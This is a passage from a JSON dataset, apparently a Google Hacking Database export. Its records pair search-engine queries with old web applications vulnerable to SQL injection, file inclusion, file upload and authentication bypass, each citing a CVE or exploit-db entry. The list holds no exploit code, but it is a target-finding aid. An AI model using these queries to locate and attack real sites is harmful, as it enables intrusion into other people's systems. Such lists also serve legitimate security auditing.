Inclusion Vulnerability - CVE: 2008-2076: http://www.exploit-db.com/exploits/5528", "submited": "2010-11-15", "request": "\"ActualAnalyzer Lite (free) 2.78\"+\"Copyright 2006 ActualScripts\"", "id": 2071}, {"short description": "\"powered by seditio\" OR \"powered by ldu\"", "long description": "Seditio CMS v121 (pfs.php) Remote File Upload Vulnerability - CVE: 2007-4057: http://www.exploit-db.com/exploits/4235", "submited": "2010-11-15", "request": "\"powered by seditio\" OR \"powered by ldu\"", "id": 2072}, {"short description": "inurl:com_forum", "long description": "com_forum Mambo Component", "submited": "2010-11-15", "request": "inurl:com_forum", "id": 2073}, {"short description": "Powered By AJ Auction", "long description": "AJ Auction v1 (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5868", "submited": 
"2010-11-15", "request": "Powered By AJ Auction", "id": 2074}, {"short description": "\"Powered by Content Injector v1.52\"", "long description": "Content Injector 1.52 (index.php cat) Remote SQL Injection Vulnerability - CVE: 2007-6137: http://www.exploit-db.com/exploits/4645", "submited": "2010-11-15", "request": "\"Powered by Content Injector v1.52\"", "id": 2075}, {"short description": "Events Calendar 1.1", "long description": "Events Calendar 1.1 Remote File Inclusion Vulnerability - CVE: 2008-4673: http://www.exploit-db.com/exploits/6623", "submited": "2010-11-15", "request": "Events Calendar 1.1", "id": 2077}, {"short description": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "long description": "Simple PHP Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10666", "submited": "2010-11-15", "request": "\"Copyright (c) 2004-2006 by Simple PHP Guestbook\"", "id": 2078}, {"short description": "inurl:inc_linksmanager.asp", "long description": "DMXReady Links Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7772", "submited": "2010-11-15", "request": "inurl:inc_linksmanager.asp", "id": 2079}, {"short description": "inurl:/index.php?option=com_otzivi", "long description": "Joomla Component com_otzivi Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10966", "submited": "2010-11-15", "request": "inurl:/index.php?option=com_otzivi", "id": 2080}, {"short description": "\"Powered by DigitalHive\"", "long description": "DigitalHive 2.0 RC2 (base_include.php) Remote Include Vulnerability - CVE: 2006-5493: http://www.exploit-db.com/exploits/2566", "submited": "2010-11-15", "request": "\"Powered by DigitalHive\"", "id": 2082}, {"short description": "inurl:\"com_casino_blackjack\"", "long description": "Joomla Casino 0.3.1 Multiple SQL Injection - CVE: 2009-2239: http://www.exploit-db.com/exploits/8743", "submited": "2010-11-15", "request": "inurl:\"com_casino_blackjack\"", "id": 2083}, 
{"short description": "inurl:\"/tagit2b/\"", "long description": "TagIt! Tagboard 2.1.b b2 (index.php) Remote File Include Vulnerability - CVE: 2006-5093: http://www.exploit-db.com/exploits/2450", "submited": "2010-11-15", "request": "inurl:\"/tagit2b/\"", "id": 2084}, {"short description": "\"powered by LionWiki \"", "long description": "LionWiki 3.X (index.php) Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12075", "submited": "2010-11-15", "request": "\"powered by LionWiki \"", "id": 2085}, {"short description": "allinurl: \"index.php?area\"galid", "long description": "Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5414", "submited": "2010-11-15", "request": "allinurl: \"index.php?area\"galid", "id": 2086}, {"short description": "inurl:\"tr1.php?id=\"", "long description": "YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: http://www.exploit-db.com/exploits/6942", "submited": "2010-11-15", "request": "inurl:\"tr1.php?id=\"", "id": 2087}, {"short description": "\"Designed by Spaceacre\"", "long description": "Spaceacre Multiple SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12551", "submited": "2010-11-15", "request": "\"Designed by Spaceacre\"", "id": 2088}, {"short description": "Powered by Shadowed Portal", "long description": "Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4769", "submited": "2010-11-15", "request": "Powered by Shadowed Portal", "id": 2089}, {"short description": "\"Powered by: PhotoPost PHP 4.6.5\"", "long description": "PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: http://www.exploit-db.com/exploits/14453", "submited": "2010-11-15", "request": "\"Powered by: PhotoPost PHP 4.6.5\"", "id": 2090}, {"short description": "inurl:\"com_otzivi\"", "long description": "Joomla Component com_otzivi Local File Inclusion Vulnerability: 
http://www.exploit-db.com/exploits/11494", "submited": "2010-11-15", "request": "inurl:\"com_otzivi\"", "id": 2091}, {"short description": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "long description": "GeneShop 5.1.1 SQL Injection Vunerability: http://www.exploit-db.com/exploits/12442", "submited": "2010-11-15", "request": "inurl:\"browse.php?folder=\" Powered by GeneShop 5", "id": 2092}, {"short description": "\"Powered by PsNews\"", "long description": "PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability - CVE: 2007-3772: http://www.exploit-db.com/exploits/4174", "submited": "2010-11-15", "request": "\"Powered by PsNews\"", "id": 2093}, {"short description": "inurl:inc_faqsmanager.asp", "long description": "DMXReady Faqs Manager 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7770", "submited": "2010-11-15", "request": "inurl:inc_faqsmanager.asp", "id": 2094}, {"short description": "\"powered by sX-Shop\"", "long description": "sX-Shop Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/14558", "submited": "2010-11-15", "request": "\"powered by sX-Shop\"", "id": 2095}, {"short description": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "long description": "ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: http://www.exploit-db.com/exploits/11080", "submited": "2010-11-15", "request": "intext:'Powered by ProArcadeScript ' inurl:'game.php?id='", "id": 2096}, {"short description": "inurl:tr.php?id= Downline", "long description": "YourFreeWorld Downline Builder (id) Remote SQL Injection Vulnerability - CVE: 2008-4895: http://www.exploit-db.com/exploits/6935", "submited": "2010-11-15", "request": "inurl:tr.php?id= Downline", "id": 2097}, {"short description": "inurl:tr.php?id= Autoresponder", "long description": "YourFreeWorld Autoresponder Hosting (id) SQL Injection Vulnerability - CVE: 2008-4882: http://www.exploit-db.com/exploits/6938", 
"submited": "2010-11-15", "request": "inurl:tr.php?id= Autoresponder", "id": 2098}, {"short description": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "long description": "PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability - CVE: 2009-4883: http://www.exploit-db.com/exploits/8330", "submited": "2010-11-15", "request": "inurl:\"/index.php?m=\" \"PHPRecipeBook 2.39\"", "id": 2099}, {"short description": "\"powered by webClassifieds\"", "long description": "webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5817: http://www.exploit-db.com/exploits/7602", "submited": "2010-11-15", "request": "\"powered by webClassifieds\"", "id": 2100}, {"short description": "inurl:/modules/Partenaires/clic.php?id=", "long description": "Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection: http://www.exploit-db.com/exploits/14556", "submited": "2010-11-15", "request": "inurl:/modules/Partenaires/clic.php?id=", "id": 2101}, {"short description": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "long description": "Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability - CVE: 2007-5316: http://www.exploit-db.com/exploits/4504", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" \"ALL JOBS\"", "id": 2102}, {"short description": "inurl:com_jabode", "long description": "Joomla Component jabode (id) Remote SQL Injection Vulnerability - CVE: 2008-7169: http://www.exploit-db.com/exploits/5963", "submited": "2010-11-15", "request": "inurl:com_jabode", "id": 2103}, {"short description": "\"powered by DBHcms\"", "long description": "DBHcms 1.1.4 Stored XSS: http://www.exploit-db.com/exploits/12499", "submited": "2010-11-15", "request": "\"powered by DBHcms\"", "id": 2104}, {"short description": "inurl:\"nabopoll/\"", "long description": "nabopoll 1.2 Remote Unprotected Admin Section Vulnerability - CVE: 2007-0873: http://www.exploit-db.com/exploits/3305", "submited": "2010-11-15", "request": "inurl:\"nabopoll/\"", "id": 2105}, 
{"short description": "intext:\"sitio web disenado por www.toronja.com.pe\"", "long description": "Toronja Cms HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12771", "submited": "2010-11-15", "request": "intext:\"sitio web disenado por www.toronja.com.pe\"", "id": 2108}, {"short description": "\"Powered by CMScout 2005 CMScout Group\"", "long description": "CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability - CVE: 2008-3415: http://www.exploit-db.com/exploits/6142", "submited": "2010-11-15", "request": "\"Powered by CMScout 2005 CMScout Group\"", "id": 2109}, {"short description": "inurl:test.php Powered by TalkBack", "long description": "TalkBack 2.3.14 Multiple Remote Vulnerabilities - CVE: 2009-4854: http://www.exploit-db.com/exploits/9095", "submited": "2010-11-15", "request": "inurl:test.php Powered by TalkBack", "id": 2111}, {"short description": "Maian Gallery v2.0 Copyright 2006-2008 Maian Script World. All Rights Reserved.", "long description": "Maian Gallery 2.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6049", "submited": "2010-11-15", "request": "Maian Gallery v2.0 Copyright 2006-2008 Maian Script World. 
All Rights Reserved.", "id": 2112}, {"short description": "\"Powered by Ovidentia\"", "long description": "Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability - CVE: 2008-3918: http://www.exploit-db.com/exploits/6232", "submited": "2010-11-15", "request": "\"Powered by Ovidentia\"", "id": 2114}, {"short description": "team5 studio all rights reserved site:cn", "long description": "Team 1.x (DD/XSS) Multiple Remote Vulnerabilities - CVE: 2009-0760: http://www.exploit-db.com/exploits/7982", "submited": "2010-11-15", "request": "team5 studio all rights reserved site:cn", "id": 2115}, {"short description": "allintext:\" If you would like to contact us, our email address is\" traffic", "long description": "Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility - CVE: 2007-3840: http://www.exploit-db.com/exploits/4187", "submited": "2010-11-15", "request": "allintext:\" If you would like to contact us, our email address is\" traffic", "id": 2116}, {"short description": "\"powered by phpGreetCards\"", "long description": "phpGreetCards XSS/Arbitrary File Upload Vulnerability - CVE: 2008-6848: http://www.exploit-db.com/exploits/7561", "submited": "2010-11-15", "request": "\"powered by phpGreetCards\"", "id": 2117}, {"short description": "powered by apt-webservice ;apt-webshop-system v3.0", "long description": "APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14528", "submited": "2010-11-15", "request": "powered by apt-webservice ;apt-webshop-system v3.0", "id": 2118}, {"short description": "Maian Music v1.0. Copyright 2007-2008 Maian Script World. All Rights Reserved.", "long description": "Maian Music 1.0 Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/6051", "submited": "2010-11-15", "request": "Maian Music v1.0. Copyright 2007-2008 Maian Script World. 
All Rights Reserved.", "id": 2121}, {"short description": "inurl:/wp-content/plugins/wpSS/", "long description": "Wordpress Plugin Spreadsheet 0.6 SQL Injection Vulnerability - CVE: 2008-1982: http://www.exploit-db.com/exploits/5486", "submited": "2010-11-15", "request": "inurl:/wp-content/plugins/wpSS/", "id": 2123}, {"short description": "\"Powerd by www.e-webtech.com\"", "long description": "e-webtech (new.asp?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12547", "submited": "2010-11-15", "request": "\"Powerd by www.e-webtech.com\"", "id": 2125}, {"short description": "inurl:inc_billboardmanager.asp?ItemID=", "long description": "DMXReady Billboard Manager 1.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7791", "submited": "2010-11-15", "request": "inurl:inc_billboardmanager.asp?ItemID=", "id": 2126}, {"short description": "allinurl :\"modules/recipe\"", "long description": "XOOPS Module Recipe (detail.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5473", "submited": "2010-11-15", "request": "allinurl :\"modules/recipe\"", "id": 2127}, {"short description": "\"powered by php advanced transfer manager\"", "long description": "phpAtm 1.30 (downloadfile) Remote File Disclosure Vulnerability - CVE: 2007-2659: http://www.exploit-db.com/exploits/3918", "submited": "2010-11-15", "request": "\"powered by php advanced transfer manager\"", "id": 2129}, {"short description": "\"Powered by GeN4\"", "long description": "PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14086", "submited": "2010-11-15", "request": "\"Powered by GeN4\"", "id": 2130}, {"short description": "\"Powered By Gravity Board X v2.0 BETA\"", "long description": "Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: http://www.exploit-db.com/exploits/8350", "submited": "2010-11-15", "request": "\"Powered By Gravity Board X v2.0 BETA\"", "id": 2131}, {"short 
description": "inurl:com_flippingbook", "long description": "Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability - CVE: 2008-2095: http://www.exploit-db.com/exploits/5484", "submited": "2010-11-15", "request": "inurl:com_flippingbook", "id": 2132}, {"short description": "\"Help desk software by United Web Coders rev. 3.0.640\"", "long description": "Trouble Ticket Software ttx.cgi Remote File Download: http://www.exploit-db.com/exploits/11823", "submited": "2010-11-15", "request": "\"Help desk software by United Web Coders rev. 3.0.640\"", "id": 2133}, {"short description": "\"Powered by vlBook 1.21\"", "long description": "vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities - CVE: 2008-2073: http://www.exploit-db.com/exploits/5529", "submited": "2010-11-15", "request": "\"Powered by vlBook 1.21\"", "id": 2135}, {"short description": "Copyright Rotator 2008", "long description": "YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6949", "submited": "2010-11-15", "request": "Copyright Rotator 2008", "id": 2136}, {"short description": "inurl:tr.php?id= Reminder Service", "long description": "YourFreeWorld Reminder Service (id) SQL Injection Vulnerability - CVE: 2008-4881: http://www.exploit-db.com/exploits/6943", "submited": "2010-11-15", "request": "inurl:tr.php?id= Reminder Service", "id": 2137}, {"short description": "\"Jevonweb Guestbook\"", "long description": "Jevonweb Guestbook Remote Admin Access: http://www.exploit-db.com/exploits/10665", "submited": "2010-11-15", "request": "\"Jevonweb Guestbook\"", "id": 2138}, {"short description": "inurl:inc_contactusmanager.asp", "long description": "DMXReady Contact Us Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7768", "submited": "2010-11-15", "request": "inurl:inc_contactusmanager.asp", "id": 2139}, {"short description": "inurl:com_neorecruit", "long description": "Joomla Component com_neorecruit 1.4 SQL Injection 
Vulnerability: http://www.exploit-db.com/exploits/14570", "submited": "2010-11-15", "request": "inurl:com_neorecruit", "id": 2140}, {"short description": "\"index.php?option=com_mdigg\"", "long description": "Joomla Component com_mdigg SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10847", "submited": "2010-11-15", "request": "\"index.php?option=com_mdigg\"", "id": 2141}, {"short description": "\"Uploader by CeleronDude.\"", "long description": "Uploader by CeleronDude 5.3.0 - Upload Vulnerability: http://www.exploit-db.com/exploits/11166", "submited": "2010-11-15", "request": "\"Uploader by CeleronDude.\"", "id": 2142}, {"short description": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "long description": "PBLang 4.66z (temppath) Remote File Include Vulnerability - CVE: 2006-5062: http://www.exploit-db.com/exploits/2428", "submited": "2010-11-15", "request": "\"Software PBLang 4.66z\" AND \"Software PBLang 4.60\" OR \"Software PBLang\"", "id": 2143}, {"short description": "'SEO by NuSEO.PHP'", "long description": "NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: http://www.exploit-db.com/exploits/4512", "submited": "2010-11-15", "request": "'SEO by NuSEO.PHP'", "id": 2144}, {"short description": "intext:\"Web design by goffgrafix.com\"", "long description": "goffgrafix Design's SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12712", "submited": "2010-11-15", "request": "intext:\"Web design by goffgrafix.com\"", "id": 2145}, {"short description": "powered by zeeways", "long description": "Zeeways Technology (product_desc.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11047", "submited": "2010-11-15", "request": "powered by zeeways", "id": 2146}, {"short description": "\"Welcome to Exponent CMS\" | \"my new exponent site\" inurl:articlemodule", "long description": "Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: 
http://www.exploit-db.com/exploits/11349", "submited": "2010-11-15", "request": "\"Welcome to Exponent CMS\" | \"my new exponent site\" inurl:articlemodule", "id": 2147}, {"short description": "intitle:\"Shorty (Beta)\"", "long description": "Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/9419", "submited": "2010-11-15", "request": "intitle:\"Shorty (Beta)\"", "id": 2148}, {"short description": "inurl:index.php?mod=ConcoursPhoto", "long description": "KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability - CVE: 2008-1758: http://www.exploit-db.com/exploits/5353", "submited": "2010-11-15", "request": "inurl:index.php?mod=ConcoursPhoto", "id": 2150}, {"short description": "\"Copyright MaxiSepet \"", "long description": "MaxiSepet 1.0 (link) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/1900", "submited": "2010-11-15", "request": "\"Copyright MaxiSepet \"", "id": 2151}, {"short description": "Powered by sabros.us", "long description": "sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: http://www.exploit-db.com/exploits/5360", "submited": "2010-11-15", "request": "Powered by sabros.us", "id": 2152}, {"short description": "inurl:inc_registrationmanager.asp", "long description": "DMXReady Registration Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7784", "submited": "2010-11-15", "request": "inurl:inc_registrationmanager.asp", "id": 2154}, {"short description": "\"Powered by Drumbeat\" inurl:index02.php", "long description": "Drumbeat CMS SQL Injection: http://www.exploit-db.com/exploits/10575", "submited": "2010-11-15", "request": "\"Powered by Drumbeat\" inurl:index02.php", "id": 2155}, {"short description": "\"Designed & Developed by N.E.T E-Commerce Group. 
All Rights Reserved.\"", "long description": "IranMC Arad Center (news.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6712", "submited": "2010-11-15", "request": "\"Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved.\"", "id": 2156}, {"short description": "\"You have not provided a survey identification number\"", "long description": "LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: http://www.exploit-db.com/exploits/4544", "submited": "2010-11-15", "request": "\"You have not provided a survey identification number\"", "id": 2157}, {"short description": "\"Powered by SocketMail Lite version 2.2.8. Copyright 2002-2006\"", "long description": "SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability - CVE: 2007-5627: http://www.exploit-db.com/exploits/4554", "submited": "2010-11-15", "request": "\"Powered by SocketMail Lite version 2.2.8. Copyright 2002-2006\"", "id": 2158}, {"short description": "\"Powered by ComicShout\"", "long description": "ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability - CVE: 2008-6425: http://www.exploit-db.com/exploits/5713", "submited": "2010-11-15", "request": "\"Powered by ComicShout\"", "id": 2159}, {"short description": "powered by Pixaria. Gallery", "long description": "Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: http://www.exploit-db.com/exploits/3733", "submited": "2010-11-15", "request": "powered by Pixaria. 
Gallery", "id": 2160}, {"short description": "\"Powered by FlashGameScript\"", "long description": "FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: http://www.exploit-db.com/exploits/4161", "submited": "2010-11-15", "request": "\"Powered by FlashGameScript\"", "id": 2161}, {"short description": "index.php?option=com_ongallery", "long description": "Joomla Component OnGallery SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14659", "submited": "2010-11-15", "request": "index.php?option=com_ongallery", "id": 2163}, {"short description": "Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php", "long description": "WHMCS Control 2 (announcements.php) SQL Injection: http://www.exploit-db.com/exploits/12481", "submited": "2010-11-15", "request": "Powered by WHMCompleteSolution - OR inurl:WHMCS OR announcements.php", "id": 2164}, {"short description": "inurl:inc_catalogmanager.asp", "long description": "DMXReady Catalog Manager 1.1 Remote Contents Change Vuln: http://www.exploit-db.com/exploits/7766", "submited": "2010-11-15", "request": "inurl:inc_catalogmanager.asp", "id": 2165}, {"short description": "\"This website is powered by Trio\"", "long description": "TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: http://www.exploit-db.com/exploits/6141", "submited": "2010-11-15", "request": "\"This website is powered by Trio\"", "id": 2166}, {"short description": "content_by_cat.asp?contentid ''catid''", "long description": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6590", "submited": "2010-11-15", "request": "content_by_cat.asp?contentid ''catid''", "id": 2168}, {"short description": "allinurl: \"pollBooth.php?op=results\"pollID", "long description": "Pollbooth 2.0 (pollID) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5436", "submited": "2010-11-15", "request": "allinurl: 
\"pollBooth.php?op=results\"pollID", "id": 2169}, {"short description": "browse_videos.php?", "long description": "phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability - CVE: 2007-3610: http://www.exploit-db.com/exploits/4153", "submited": "2010-11-15", "request": "browse_videos.php?", "id": 2170}, {"short description": "inurl:JBSPro", "long description": "JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: http://www.exploit-db.com/exploits/1571", "submited": "2010-11-15", "request": "inurl:JBSPro", "id": 2172}, {"short description": "inurl:inc_joblistingmanager.asp", "long description": "DMXReady Job Listing 1.1 Remote Contents Change Vulnerability: http://www.exploit-db.com/exploits/7771", "submited": "2010-11-15", "request": "inurl:inc_joblistingmanager.asp", "id": 2174}, {"short description": "\"Factux le facturier libre V 1.1.5\"", "long description": "Factux LFI Vulnerability: http://www.exploit-db.com/exploits/12521", "submited": "2010-11-15", "request": "\"Factux le facturier libre V 1.1.5\"", "id": 2175}, {"short description": "Maintained with the Ocean12 Contact Manager Pro v1.02", "long description": "Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities - CVE: 2008-6369: http://www.exploit-db.com/exploits/7244", "submited": "2010-11-15", "request": "Maintained with the Ocean12 Contact Manager Pro v1.02", "id": 2176}, {"short description": "buyers_subcategories.php?IndustryID=", "long description": "Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12245", "submited": "2010-11-15", "request": "buyers_subcategories.php?IndustryID=", "id": 2177}, {"short description": "\"Powered by Minerva\"", "long description": "Minerva 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability - CVE: 2006-5077: http://www.exploit-db.com/exploits/2429", "submited": "2010-11-15", "request": "\"Powered by Minerva\"", "id": 2178}, {"short description": 
"inurl:\"izle.asp?oyun=\"", "long description": "FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability - CVE: 2008-4176: http://www.exploit-db.com/exploits/6453", "submited": "2010-11-15", "request": "inurl:\"izle.asp?oyun=\"", "id": 2179}, {"short description": "Copyright Viral Marketing 2008", "long description": "YourFreeWorld Viral Marketing (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6941", "submited": "2010-11-15", "request": "Copyright Viral Marketing 2008", "id": 2180}, {"short description": "inurl:\"IDFM=\" \"form.php\"", "long description": "360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability - CVE: 2008-0430: http://www.exploit-db.com/exploits/4944", "submited": "2010-11-15", "request": "inurl:\"IDFM=\" \"form.php\"", "id": 2181}, {"short description": "inurl:inc_newsmanager.asp", "long description": "DMXReady News Manager 1.1 Arbitrary Category Change Vuln: http://www.exploit-db.com/exploits/7752", "submited": "2010-11-15", "request": "inurl:inc_newsmanager.asp", "id": 2182}, {"short description": "Powered by XAOS systems", "long description": "XAOS CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14469", "submited": "2010-11-15", "request": "Powered by XAOS systems", "id": 2183}, {"short description": "inurl:inc_documentlibrarymanager.asp", "long description": "DMXReady Document Library Manager 1.1 Contents Change Vuln: http://www.exploit-db.com/exploits/7769", "submited": "2010-11-15", "request": "inurl:inc_documentlibrarymanager.asp", "id": 2184}, {"short description": "inurl:inc_photogallerymanager.asp", "long description": "DMXReady Photo Gallery Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7783", "submited": "2010-11-15", "request": "inurl:inc_photogallerymanager.asp", "id": 2185}, {"short description": "Powered by Arctic v2.0.0", "long description": "Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: 
http://www.exploit-db.com/exploits/6097", "submited": "2010-11-15", "request": "Powered by Arctic v2.0.0", "id": 2186}, {"short description": "inurl:\"phpRaid\" \"phpRaid\" \"roster.php?Sort=Race\"", "long description": "phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: http://www.exploit-db.com/exploits/3528", "submited": "2010-11-15", "request": "inurl:\"phpRaid\" \"phpRaid\" \"roster.php?Sort=Race\"", "id": 2187}, {"short description": "inurl:\"classifieds.php?cat=\"", "long description": "BM Classifieds Ads SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10314", "submited": "2010-11-15", "request": "inurl:\"classifieds.php?cat=\"", "id": 2189}, {"short description": "Powered by: Zanfi Solutions", "long description": "Zanfi CMS lite 1.2 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-4158: http://www.exploit-db.com/exploits/6413", "submited": "2010-11-15", "request": "Powered by: Zanfi Solutions", "id": 2190}, {"short description": "inurl:\"index.php?option=com_jequoteform\"", "long description": "Joomla Component com_jequoteform - Local File Inclusion - CVE: 2010-2128: http://www.exploit-db.com/exploits/12607", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jequoteform\"", "id": 2191}, {"short description": "\"Powered by SiteX 0.7 Beta\"", "long description": "SiteX 0.7.4.418 (THEME_FOLDER) Local File Inclusion Vulnerabilities - CVE: 2009-1846: http://www.exploit-db.com/exploits/8816", "submited": "2010-11-15", "request": "\"Powered by SiteX 0.7 Beta\"", "id": 2192}, {"short description": "inurl:\"freshlinks_panel/index.php?linkid\"", "long description": "PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln - CVE: 2008-5074: http://www.exploit-db.com/exploits/6620", "submited": "2010-11-15", "request": "inurl:\"freshlinks_panel/index.php?linkid\"", "id": 2193}, {"short description": "Powered By WebSihirbazi", "long description": "WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability - CVE: 
2007-6556: http://www.exploit-db.com/exploits/4777", "submited": "2010-11-15", "request": "Powered By WebSihirbazi", "id": 2194}, {"short description": "\"Software Categories\" \"Featured Resources\" \"Search\"", "long description": "HotScripts Clone Script Remote SQL Injection Vulnerability - CVE: 2007-6084: http://www.exploit-db.com/exploits/4633", "submited": "2010-11-15", "request": "\"Software Categories\" \"Featured Resources\" \"Search\"", "id": 2196}, {"short description": "\"Website Powered By Creative SplashWorks - SplashSite\"", "long description": "Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11300", "submited": "2010-11-15", "request": "\"Website Powered By Creative SplashWorks - SplashSite\"", "id": 2197}, {"short description": "inurl:inc_paypalstoremanager.asp", "long description": "DMXReady PayPal Store Manager 1.1 Contents Change Vulnerability: http://www.exploit-db.com/exploits/7782", "submited": "2010-11-15", "request": "inurl:inc_paypalstoremanager.asp", "id": 2199}, {"short description": "Powered By phpCOIN 1.2.3", "long description": "phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: http://www.exploit-db.com/exploits/2254", "submited": "2010-11-15", "request": "Powered By phpCOIN 1.2.3", "id": 2200}, {"short description": "inurl:\"index.php?com_remository\"", "long description": "Joomla Component (com_remository) Remote Upload File: http://www.exploit-db.com/exploits/14811", "submited": "2010-11-15", "request": "inurl:\"index.php?com_remository\"", "id": 2201}, {"short description": "Powered By: Simplicity oF Upload", "long description": "Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability - CVE: 2009-4818: http://www.exploit-db.com/exploits/10568", "submited": "2010-11-15", "request": "Powered By: Simplicity oF Upload", "id": 2202}, {"short description": "\"Developed by Quate.net.\"", "long description": "Grape Statistics 0.2a 
(location) Remote File Inclusion Vulnerability - CVE: 2008-1963: http://www.exploit-db.com/exploits/5463", "submited": "2010-11-15", "request": "\"Developed by Quate.net.\"", "id": 2203}, {"short description": "allinurl:directory.php?ax=list", "long description": "Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility - CVE: 2007-3809: http://www.exploit-db.com/exploits/4185", "submited": "2010-11-15", "request": "allinurl:directory.php?ax=list", "id": 2206}, {"short description": "inurl:w3.php?nodeId=", "long description": "Aspect Ratio CMS Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15205", "submited": "2010-11-15", "request": "inurl:w3.php?nodeId=", "id": 2207}, {"short description": "VS-Gastebuch V.", "long description": "S-Gastebuch 1.5.3 (gb_pfad) Remote File Include - CVE: 2007-1011: http://www.exploit-db.com/exploits/3328", "submited": "2010-11-15", "request": "VS-Gastebuch V.", "id": 2208}, {"short description": "Uebimiau Webmail v3.2.0-1.8", "long description": "Uebimiau Web-Mail v3.2.0-1.8 Remote File / Overwrite Vulnerabilities: http://www.exploit-db.com/exploits/8944", "submited": "2010-11-15", "request": "Uebimiau Webmail v3.2.0-1.8", "id": 2209}, {"short description": "2007 by Lama Software - Accomm Solutions GmbH & Co. KG", "long description": "Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0423: http://www.exploit-db.com/exploits/4955", "submited": "2010-11-15", "request": "2007 by Lama Software - Accomm Solutions GmbH & Co. 
